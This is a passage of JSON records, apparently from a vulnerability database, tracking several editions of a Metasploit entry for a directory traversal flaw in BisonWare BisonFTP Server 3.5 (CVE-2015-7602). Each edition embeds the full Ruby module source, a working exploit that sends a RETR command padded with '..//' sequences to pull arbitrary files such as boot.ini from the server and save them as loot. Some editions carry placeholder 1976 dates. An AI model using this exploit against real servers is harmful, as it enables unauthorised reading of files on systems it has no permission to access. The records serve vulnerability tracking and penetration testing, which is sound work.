"AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-04-20T22:29:59", "differentElements": ["modified", "published"], "edition": 20}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-04-21T00:30:18", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-04-21T00:30:18", "differentElements": ["modified", "published"], "edition": 21}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-04-25T12:40:34", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-04-25T12:40:34", "differentElements": ["modified", "published"], "edition": 22}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-04-25T14:41:36", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-04-25T14:41:36", "differentElements": ["modified", "published"], "edition": 23}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-04-28T10:45:06", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-04-28T10:45:06", "differentElements": ["modified", "published"], "edition": 24}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-04-28T14:42:14", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-04-28T14:42:14", "differentElements": ["modified", "published"], "edition": 25}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-05-09T17:03:32", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": 